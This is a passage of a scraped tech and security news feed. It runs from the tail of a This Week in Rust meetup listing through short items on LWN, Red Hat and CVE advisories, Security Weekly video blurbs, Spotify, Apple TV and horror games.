<li><a href="https://www.meetup.com/women-in-rust/events/315213885/"><strong>👋 Community Catch Up</strong></a></li>
</ul>
</li>
<li>2026-08-05 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/f2hnzrug"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-08-05 | Virtual (Indianapolis, IN, US) | <a href="https://www.meetup.com/indyrs/events/">Indy Rust</a><ul>
<li><a href="https://www.meetup.com/indyrs/events/315210367/"><strong>Indy.rs - with Social Distancing</strong></a></li>
</ul>
</li>
<li>2026-08-11 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust/events/">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254776/"><strong>Second Tuesday</strong></a></li>
</ul>
</li>
<li>2026-08-12 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/f2hnzrug"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-07-19 | Virtual (Bangalore, IN) | <a href="https://discord.gg/VJyv3NfVdw">Embedded Rust Discord</a><ul>
<li><a href="https://discord.gg/6gwCNpFP?event=1526087936234225814"><strong>Silicon Sundays</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#asia">Asia</a></h5>
<ul>
<li>2026-07-18 | Bangalore, IN | <a href="https://hasgeek.com/rustbangalore">Rust Bangalore</a><ul>
<li><a href="https://hasgeek.com/rustbangalore/july-2026-rustacean-meetup/"><strong>July 2026 Rustacean Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-19 | Virtual (Bangalore, IN) | <a href="https://discord.gg/VJyv3NfVdw">Embedded Rust Discord</a><ul>
<li><a href="https://discord.gg/6gwCNpFP?event=1526087936234225814"><strong>Silicon Sundays</strong></a></li>
</ul>
</li>
<li>2026-07-25 | Mumbai, IN | <a href="https://luma.com/mumbai">Rust Mumbai</a><ul>
<li><a href="https://luma.com/7ksabwbm/"><strong>​Rust Mumbai — July Meetup 🦀</strong></a></li>
</ul>
</li>
<li>2026-07-26 | Pune, MA, IN | <a href="https://www.meetup.com/rust-pune/events/">Rust Pune</a><ul>
<li><a href="https://www.meetup.com/rust-pune/events/315651505/"><strong>Rust Pune: July 2026</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#europe">Europe</a></h5>
<ul>
<li>2026-07-15 | Dortmund, DE | <a href="https://www.meetup.com/rust-dortmund/events/">Rust Dortmund</a><ul>
<li><a href="https://www.meetup.com/rust-dortmund/events/315496876/"><strong>Teach and Hack at Projektspeicher</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Leipzig, DE | <a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig">Rust - Modern Systems Programming in Leipzig</a><ul>
<li><a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig/events/313816470/"><strong>Supercharge Rust funcs with implicit arguments and context-generic programming</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/315484101/"><strong>Rust Berlin Talks: The next generation</strong></a></li>
</ul>
</li>
<li>2026-07-23 | London, UK | <a href="https://www.meetup.com/london-rust-project-group">London Rust Project Group</a><ul>
<li><a href="https://www.meetup.com/london-rust-project-group/events/315366453/"><strong>Rama modular service framework for Rust</strong></a></li>
</ul>
</li>
<li>2026-07-23 | London, UK | <a href="https://www.meetup.com/rust-london-user-group/events/">Rust London User Group</a><ul>
<li><a href="https://www.meetup.com/rust-london-user-group/events/315612916/"><strong>LDN Talks: July 2026 Antithesis Takeover</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Paris, FR | <a href="https://www.meetup.com/rust-paris">Rust Paris</a><ul>
<li><a href="https://www.meetup.com/rust-paris/events/315309633/"><strong>Rust meetup #87</strong></a></li>
</ul>
</li>
<li>2026-07-29 | Poland, PL | <a href="https://www.meetup.com/rust-poland-meetup">Rust Poland</a><ul>
<li><a href="https://www.meetup.com/rust-poland-meetup/events/315582674/"><strong>Rust Poland x Kraków #10</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Manchester, GB | <a href="https://www.meetup.com/rust-manchester/events/">Rust Manchester</a><ul>
<li><a href="https://www.meetup.com/rust-manchester/events/315037685/"><strong>Rust Manchester July Code Night</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#north-america">North America</a></h5>
<ul>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
</ul>
</li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a><ul>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-18 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315225872/"><strong>North End Rust Lunch, July 18</strong></a></li>
</ul>
</li>
<li>2026-07-21 | San Francisco, CA, US | <a href="https://www.meetup.com/san-francisco-rust-study-group">San Francisco Rust Study Group</a><ul>
<li><a href="https://www.meetup.com/san-francisco-rust-study-group/events/314997214/"><strong>Rust Hacking in Person</strong></a></li>
</ul>
</li>
<li>2026-07-22 | Austin, TX, US | <a href="https://www.meetup.com/rust-atx">Rust ATX</a><ul>
<li><a href="https://www.meetup.com/rust-atx/events/xvkdgtyjckbdc/"><strong>Rust Lunch - Fareground</strong></a></li>
</ul>
</li>
<li>2026-07-22 | Los Angeles, CA, US | <a href="https://www.meetup.com/rust-los-angeles">Rust Los Angeles</a><ul>
<li><a href="https://www.meetup.com/rust-los-angeles/events/315376271/"><strong>Rust LA: Rust in Distributed Systems with Flight Science!</strong></a></li>
</ul>
</li>
<li>2026-07-22 | New York, NY, US | <a href="https://www.meetup.com/rust-nyc/events/">Rust NYC</a><ul>
<li><a href="https://www.meetup.com/rust-nyc/events/315636854/"><strong>Rust NYC: Write A Custom Coding Agent and wasm_zero</strong></a></li>
</ul>
</li>
<li>2026-07-25 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315582650/"><strong>Porter Square Rust Lunch, July 25</strong></a></li>
</ul>
</li>
<li>2026-07-25 | Brooklyn, NY, US | <a href="https://flowercomputer.com/">Flower</a><ul>
<li><a href="https://partiful.com/e/Vq9fyDNCMSO7ia4ulK5b"><strong>BOG-A-THON 2</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Atlanta, GA, US | <a href="https://www.meetup.com/rust-atl/events/">Rust Atlanta</a><ul>
<li><a href="https://www.meetup.com/rust-atl/events/313539329/"><strong>Rust-Atl</strong></a></li>
</ul>
</li>
<li>2026-08-01 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315582653/"><strong>Chinatown Rust Lunch, Aug 1</strong></a></li>
</ul>
</li>
<li>2026-08-04 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/314660176/"><strong>Evening Boston Rust Meetup at Red Hat, Aug 4</strong></a></li>
</ul>
</li>
<li>2026-08-06 | Saint Louis, MO, US | <a href="https://www.meetup.com/stl-rust/events/">STL Rust</a><ul>
<li><a href="https://www.meetup.com/stl-rust/events/314701905/"><strong>Shipping Temporal: How a Global Rust Ecosystem Built Chrome’s Newest Web API</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#south-america">South America</a></h5>
<ul>
<li>2026-08-08 | São Paulo, SP | <a href="https://luma.com/calendar/cal-bif2oHITU1aVvsr">Rust-SP</a><ul>
<li><a href="https://luma.com/41oiyhtk"><strong>Rust SP - Aug/2026</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#oceania">Oceania</a></h5>
<ul>
<li>2026-07-21 | Barton, AU | <a href="https://www.meetup.com/rust-canberra">Canberra Rust User Group</a><ul>
<li><a href="https://www.meetup.com/rust-canberra/events/315307280/"><strong>July Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Perth, AU | <a href="https://www.meetup.com/perth-rust-meetup-group">Rust Perth Meetup Group</a><ul>
<li><a href="https://www.meetup.com/perth-rust-meetup-group/events/315451138/"><strong>Rust Perth: July Meetup!</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Melbourne, AU | <a href="https://www.meetup.com/rust-melbourne/events/">Rust Melbourne</a><ul>
<li><a href="https://www.meetup.com/rust-melbourne/events/315039480/"><strong>Rust Melbourne July 2026</strong></a></li>
</ul>
</li>
</ul>
<p>If you are running a Rust event please add it to the <a href="https://www.google.com/calendar/embed?src=apd9vmbc22egenmtu5l6c5jbfc%40group.calendar.google.com">calendar</a> to get
it mentioned here. Please remember to add a link to the event too.
Email the <a href="mailto:community-team@rust-lang.org">Rust Community Team</a> for access.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#jobs">Jobs</a></h4>
<p>Please see the latest <a href="https://www.reddit.com/r/rust/comments/1ttbtf5/official_rrust_whos_hiring_thread_for_jobseekers/">Who's Hiring thread on r/rust</a></p>
<h3><a class="toclink" href="https://this-week-in-rust.org/atom.xml#quote-of-the-week">Quote of the Week</a></h3>
<blockquote>
<p>Thank you for your PR, but please edit the description like you are a chainsaw-wielding maniac that just discovered the sentences are young adults who came to the lake at summer camp after sunset.</p>
</blockquote>
<p>– <a href="https://github.com/rust-lang/rust/pull/159039#issuecomment-4931084997">workingjubilee on Rust github</a></p>
<p>Thanks to <a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328/1786">Theemathas</a> for the suggestion!</p>
<p><a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328">Please submit quotes and vote for next week!</a></p>
<p>This Week in Rust is edited by:</p>
<ul>
<li><a href="https://github.com/nellshamrell">nellshamrell</a></li>
<li><a href="https://github.com/llogiq">llogiq</a></li>
<li><a href="https://github.com/ericseppanen">ericseppanen</a></li>
<li><a href="https://github.com/extrawurst">extrawurst</a></li>
<li><a href="https://github.com/U007D">U007D</a></li>
<li><a href="https://github.com/mariannegoldin">mariannegoldin</a></li>
<li><a href="https://github.com/bdillo">bdillo</a></li>
<li><a href="https://github.com/opeolluwa">opeolluwa</a></li>
<li><a href="https://github.com/bnchi">bnchi</a></li>
<li><a href="https://github.com/KannanPalani57">KannanPalani57</a></li>
<li><a href="https://github.com/tzilist">tzilist</a></li>
</ul>
<p><em>Email list hosting is sponsored by <a href="https://foundation.rust-lang.org/">The Rust Foundation</a></em></p>
<p><small><a href="https://www.reddit.com/r/rust/comments/1uxsigp/this_week_in_rust_660/">Discuss on r/rust</a></small></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] LWN.net Weekly Edition for July 16, 2026]]></title>
<description><![CDATA[Inside this week's LWN.net Weekly Edition:
        
        
 Front: Fighting scraper bots; io_uring queues; Filesystem testing; BPF shielding; Sending packets from BPF; Kitty; QBE.
             Briefs: Shim security; seunshare vulnerability; Debian bookworm; Rust 1.97.0; Linux.org; Quotes; ...
 ...]]></description>
<link>https://tsecurity.de/de/3672183/linux-tipps/lwnnet-weekly-edition-for-july-16-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672183/linux-tipps/lwnnet-weekly-edition-for-july-16-2026/</guid>
<pubDate>Thu, 16 Jul 2026 03:53:52 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Inside this week's LWN.net Weekly Edition:
        <p>
        </p><ul>
<li> <a href="https://lwn.net/Articles/1081915/">Front</a>: Fighting scraper bots; io_uring queues; Filesystem testing; BPF shielding; Sending packets from BPF; Kitty; QBE.
            </li><li> <a href="https://lwn.net/Articles/1081917/">Briefs</a>: Shim security; seunshare vulnerability; Debian bookworm; Rust 1.97.0; Linux.org; Quotes; ...
            </li><li> <a href="https://lwn.net/Articles/1081918/">Announcements</a>: Newsletters, conferences, security updates, patches, and more.
            </li></ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Denial of Service in perl-XML-LibXML (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3671907/unix-server/security-denial-of-service-in-perl-xml-libxml-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671907/unix-server/security-denial-of-service-in-perl-xml-libxml-red-hat/</guid>
<pubDate>Wed, 15 Jul 2026 23:32:06 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Denial of Service in perl-XML-LibXML (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3671903/unix-server/security-denial-of-service-in-perl-xml-libxml-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671903/unix-server/security-denial-of-service-in-perl-xml-libxml-red-hat/</guid>
<pubDate>Wed, 15 Jul 2026 23:32:02 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Denial of Service in perl-XML-LibXML (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3671900/unix-server/security-denial-of-service-in-perl-xml-libxml-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671900/unix-server/security-denial-of-service-in-perl-xml-libxml-red-hat/</guid>
<pubDate>Wed, 15 Jul 2026 23:31:58 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Stop Treating AI Like Coworkers]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 Some organizations are giving AI agents names, titles, and workplace roles to encourage adoption. An MIT article argues that AI agents are not coworkers, despite how they're often presented.

Anthropomorphism—the tendency to assig...]]></description>
<link>https://tsecurity.de/de/3671867/it-security-video/stop-treating-ai-like-coworkers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671867/it-security-video/stop-treating-ai-like-coworkers/</guid>
<pubDate>Wed, 15 Jul 2026 23:02:22 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/TflN53_YMUk?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Some organizations are giving AI agents names, titles, and workplace roles to encourage adoption. An MIT article argues that AI agents are not coworkers, despite how they're often presented.<br />
<br />
Anthropomorphism—the tendency to assign human qualities to non-human things—can influence how people trust, interact with, and depend on AI. While human-like framing may improve adoption, it can also blur important boundaries about what AI can and cannot do.<br />
<br />
Does giving AI a human identity make these systems easier to use—or does it encourage people to trust them more than they should?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#WorkplaceAI #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Spotify just made managed accounts free for all parents, no Premium required]]></title>
<description><![CDATA[Spotify managed accounts are now available to many more families after Spotify removed the Premium subscription requirement for parents and guardians. Starting today, parents with a free Spotify account can create a managed account for their child in supported countries, making it easier to give ...]]></description>
<link>https://tsecurity.de/de/3671486/ios-mac-os/spotify-just-made-managed-accounts-free-for-all-parents-no-premium-required/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671486/ios-mac-os/spotify-just-made-managed-accounts-free-for-all-parents-no-premium-required/</guid>
<pubDate>Wed, 15 Jul 2026 19:25:41 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Spotify managed accounts are now available to many more families after Spotify removed the Premium subscription requirement for parents and guardians. Starting today, parents with a free Spotify account can create a managed account for their child in supported countries, making it easier to give young listeners a safer music experience with built in parental controls.



Spotify managed accounts now available on free accounts



Spotify says parents can now create a free managed account for children under 13 in the United States, the United Kingdom, Australia, France, Germany, and the Netherlands, while more countries across Europe, Latin America, and other regions will receive the feature soon.




"Managed accounts let young listeners explore music only, while you control the experience."




Parents can add a child account from the Spotify home page by selecting Add account and then Add a child under 13. During setup, they can filter explicit content, block specific songs or artists, disable videos and Canvas, and protect the main account with a PIN when using a shared device.



Spotify says managed accounts keep a child's music activity separate from the parent's account, which means recommendations, playlists, and Spotify Wrapped stay independent. Children also receive personalized music features such as Discover Weekly and Daylist while remaining in a music only environment without access to podcasts or audiobooks.




"Profiles can't be followed or searched by other users" and managed accounts also have "no in app purchases."




The company explains that managed accounts work on phones, tablets, and speakers, and children do not need their own phone to use one. Parents can manage up to 10 child accounts on the free plan, while Premium Family subscribers can also assign available Family plan slots to managed accounts for ad free listening and offline downloads.



Spotify adds that managed accounts can become regular Spotify accounts once children reach the minimum age in their country, although parents must approve the change until the user turns 18.]]></content:encoded>
</item>
<item>
<title><![CDATA[Patch These Joomla Vulnerabilities Now]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:3 CISA added vulnerabilities affecting the iCagenda and Babioon Forms Joomla extensions to its Known Exploited Vulnerabilities catalog after evidence of active exploitation. The flaws can enable remote code execution through arbitra...]]></description>
<link>https://tsecurity.de/de/3671453/it-security-video/patch-these-joomla-vulnerabilities-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671453/it-security-video/patch-these-joomla-vulnerabilities-now/</guid>
<pubDate>Wed, 15 Jul 2026 19:18:32 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:3 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/Icbgz8g9x-M?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>CISA added vulnerabilities affecting the iCagenda and Babioon Forms Joomla extensions to its Known Exploited Vulnerabilities catalog after evidence of active exploitation. The flaws can enable remote code execution through arbitrary file uploads.<br />
<br />
When CISA gives a vulnerability its highest priority and requires rapid remediation, it's a strong signal that organizations should assess their exposure immediately. Even if you're not a federal agency, active exploitation means attackers may already be scanning for vulnerable systems.<br />
<br />
Do you know which plugins and extensions your websites depend on—and how quickly you can patch them?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#Joomla #CISA #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple TV Sets Return Date for Where’s Wanda? Season 2, First Look Released]]></title>
<description><![CDATA[Apple TV has revealed the first look at Where’s Wanda? season two, confirming that the German dark comedy will return on October 21, 2026. The new image brings the Klatt family back together, although their attempt to return to a normal life will quickly fall apart when Wanda becomes involved in ...]]></description>
<link>https://tsecurity.de/de/3671171/ios-mac-os/apple-tv-sets-return-date-for-wheres-wanda-season-2-first-look-released/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671171/ios-mac-os/apple-tv-sets-return-date-for-wheres-wanda-season-2-first-look-released/</guid>
<pubDate>Wed, 15 Jul 2026 17:25:43 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple TV has revealed the first look at Where’s Wanda? season two, confirming that the German dark comedy will return on October 21, 2026. The new image brings the Klatt family back together, although their attempt to return to a normal life will quickly fall apart when Wanda becomes involved in another murder mystery.



The first season followed Carlotta and Dedo Klatt as they searched for their missing teenage daughter after losing confidence in the police investigation. Their unusual surveillance operation exposed secrets across their quiet suburban town while slowly bringing them closer to discovering what happened to Wanda.







Season two will introduce a different problem for the family. This time, the Klatts already know where Wanda is, but they must prove that she did not commit murder.




Series: Where’s Wanda? season two



Genre: Dark comedy, mystery and crime



Number of episodes: Eight



Season premiere: Wednesday, October 21, 2026



Season finale: Wednesday, December 9, 2026



Release schedule: One new episode every Wednesday



Streaming platform: Apple TV



Main cast: Heike Makatsch, Axel Stein, Lea Drinda and Leo Simon




Season two will premiere globally with one episode on October 21. The remaining episodes will arrive weekly until the finale on December 9.



Where’s Wanda? Season Two Plot



Spoilers for season one follow.



Season two begins after Wanda has returned to her family and the Klatts believe the worst part of their lives is behind them. That sense of relief ends when Wanda is discovered standing over a dead body and appears to have been caught at the scene of a murder.



Carlotta and Dedo refuse to accept that their daughter is responsible. Determined to protect her, they begin another investigation without waiting for the authorities to solve the case.



Their search for the real murderer takes them deeper into the criminal side of their seemingly peaceful town. The family will have to question neighbours, follow dangerous leads and uncover more secrets while trying to keep Wanda away from prison.



The new storyline continues the show’s mix of family drama, crime and uncomfortable comedy. The first season focused on finding Wanda, while the second places her at the centre of a new mystery. The biggest question will be what Wanda was doing beside the body and whether someone deliberately arranged the scene to make her look guilty.



Who Is Returning for Where’s Wanda? Season Two?



Heike Makatsch returns as Carlotta Klatt, with Axel Stein once again playing her husband, Dedo. Lea Drinda will reprise her role as Wanda, while Leo Simon returns as her brother, Ole.



The Klatt family remains the centre of the series. Their relationships will face another serious test as they investigate the murder and deal with the possibility that Wanda has kept important details from them.



FAQs



When does Where’s Wanda? season two come out? Where’s Wanda? season two premieres on Apple TV on Wednesday, October 21, 2026.  How many episodes are in Where’s Wanda? season two? The second season has eight episodes. One episode will arrive on the premiere date, followed by weekly releases through December 9, 2026.  What is Where’s Wanda? season two about? Season two follows the Klatt family as they try to prove Wanda’s innocence after she is found standing over a dead body. Their investigation leads them into the criminal underworld of their suburban town.  Do I need to watch season one first? Yes. The second season continues the Klatt family’s story and reveals what happened after Wanda’s disappearance. Watching season one first will explain the family relationships, the town’s secrets and Wanda’s return.  Is there a Where’s Wanda? season two trailer? A full season two trailer has not been released yet. Apple TV has currently shared the first image and initial story details for the new episodes.  



Where’s Wanda? season two starts streaming on October 21, giving viewers another dark and unusual mystery involving the Klatt family.



Apple TV costs $12.99 per month in the United States after a seven-day free trial. What do you think happened at the murder scene, and will the Klatts manage to prove Wanda’s innocence? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Attackers Find Bugs Before CVEs]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:2 Responsible disclosure gives vendors time to develop patches before vulnerabilities are publicly disclosed. That process can take months, while attackers may already be searching for and exploiting the same weaknesses.

By combini...]]></description>
<link>https://tsecurity.de/de/3670943/it-security-video/attackers-find-bugs-before-cves/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670943/it-security-video/attackers-find-bugs-before-cves/</guid>
<pubDate>Wed, 15 Jul 2026 16:19:19 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:2 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/svhU1Ql58Zc?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Responsible disclosure gives vendors time to develop patches before vulnerabilities are publicly disclosed. That process can take months, while attackers may already be searching for and exploiting the same weaknesses.<br />
<br />
By combining AI with large-scale vulnerability data, security teams can identify likely weaknesses earlier, validate them with engineering teams, and notify customers before a vulnerability receives a CVE. The goal isn't replacing responsible disclosure—it's reducing the window of exposure.<br />
<br />
Should vulnerability management evolve from reacting to published CVEs to predicting where the next vulnerability is likely to emerge?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#VulnerabilityManagement #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Zombies, gore and creepy kids – why we can’t stop playing horror games]]></title>
<description><![CDATA[As global anxieties multiply, ​v​ideo games from Resident Evil to Mouthwashing are providing rich source material to help decode society’s problems• Don’t get Pushing Buttons delivered to your inbox? Sign up hereHorror is so hot right now. There’s Obsession, Evil Dead Burn and Hokum in the cinema...]]></description>
<link>https://tsecurity.de/de/3670928/it-nachrichten/zombies-gore-and-creepy-kids-why-we-cant-stop-playing-horror-games/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670928/it-nachrichten/zombies-gore-and-creepy-kids-why-we-cant-stop-playing-horror-games/</guid>
<pubDate>Wed, 15 Jul 2026 16:18:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>As global anxieties multiply, ​v​ideo games from Resident Evil to Mouthwashing are providing rich source material to help decode society’s problems</p><p><strong>• </strong><a href="https://www.theguardian.com/info/ng-interactive/2021/nov/24/sign-up-for-pushing-buttons-keza-macdonalds-weekly-look-at-the-world-of-gaming"><strong>Don’t get Pushing Buttons delivered to your inbox? Sign up here</strong></a></p><p>Horror is <a href="https://www.theguardian.com/culture/2026/jun/05/horrors-hollywood-takeover-is-an-exciting-moment-but-wont-someone-think-of-the-squeamish">so hot right now</a>. There’s Obsession, Evil Dead Burn and Hokum in the cinema, Widow’s Bay, From and Something Very Bad Is Going to Happen on TV, and, of course, a rotting smorgasbord of horror games including <a href="https://www.theguardian.com/games/2026/feb/26/resident-evil-requiem-review-theres-plenty-of-life-in-the-undead-yet">Resident Evil Requiem</a> (pictured top) and <a href="https://www.theguardian.com/games/2026/feb/11/reanimal-review">Reanimal</a>, soon to be joined by Silent Hill: Townfall, Silver Pines and Dreadmoor. We’re also seeing weird cross-pollinations, with horror movie studio Blumhouse making games, while games themselves become horror films and <a href="https://www.theguardian.com/film/2026/may/27/backrooms-review-kane-parsons-icily-disturbing-horror-rewrites-the-genre-rulebook">the whole backrooms genre</a> infects every medium it touches.</p><p>So it was fascinating to attend last week’s horror and gaming conference at Falmouth University, in Cornwall: a gathering of students, researchers and lecturers, all engaged in the academic study of horror games. There were brilliant talks on zombies and posthumanism, the gothic in games, and the role of monstrous little girls in survival horror (there are a lot of them!). Subjects as diverse as masculine fragility, disability and ageing came up; Will Doyle, creative director at Supermassive Games, gave a great keynote on the art of creating horror in games using tools such as revulsion, spatial alienation and the human instinct of <a href="https://www.theguardian.com/world/2023/apr/13/are-coincidences-real">apophenia</a>. I learned a lot about theorists such as Julia Kristeva and Mark Fisher, and about the technical similarities between indie horror games and film noir (for example, the use of darkness and creative camera techniques to “hide” budget restrictions). It was incredible fun.</p> <a href="https://www.theguardian.com/games/2026/jul/15/pushing-buttons-horror-game-cultural-crisis-scholars">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fertigung im KI-Zeitalter: Hacker nehmen Fabriken ins Visier | Computer Weekly]]></title>
<description><![CDATA[Auch hier sprechen die Statistiken eine deutliche Sprache: 2024 waren mehr als 40 Prozent (PDF) der Hacking-Vorfälle auf externe Anbieter ...]]></description>
<link>https://tsecurity.de/de/3670900/hacking/fertigung-im-ki-zeitalter-hacker-nehmen-fabriken-ins-visier-computer-weekly/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670900/hacking/fertigung-im-ki-zeitalter-hacker-nehmen-fabriken-ins-visier-computer-weekly/</guid>
<pubDate>Wed, 15 Jul 2026 16:08:37 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Auch hier sprechen die Statistiken eine deutliche Sprache: 2024 waren mehr als 40 Prozent (PDF) der <b>Hacking</b>-Vorfälle auf externe Anbieter ...]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-15392 | Perl DBD::File up to 1.650 File Path Resolver complete_table_name symlink (Nessus ID 326904)]]></title>
<description><![CDATA[A vulnerability labeled as problematic has been found in Perl DBD::File up to 1.650. Affected by this issue is the function complete_table_name of the component File Path Resolver. Executing a manipulation can lead to symlink following.

This vulnerability is handled as CVE-2026-15392. It is poss...]]></description>
<link>https://tsecurity.de/de/3670870/sicherheitsluecken/cve-2026-15392-perl-dbdfile-up-to-1650-file-path-resolver-completetablename-symlink-nessus-id-326904/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670870/sicherheitsluecken/cve-2026-15392-perl-dbdfile-up-to-1650-file-path-resolver-completetablename-symlink-nessus-id-326904/</guid>
<pubDate>Wed, 15 Jul 2026 15:55:20 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/perl:dbd_file">Perl DBD::File up to 1.650</a>. Affected by this issue is the function <code>complete_table_name</code> of the component <em>File Path Resolver</em>. Executing a manipulation can lead to symlink following.

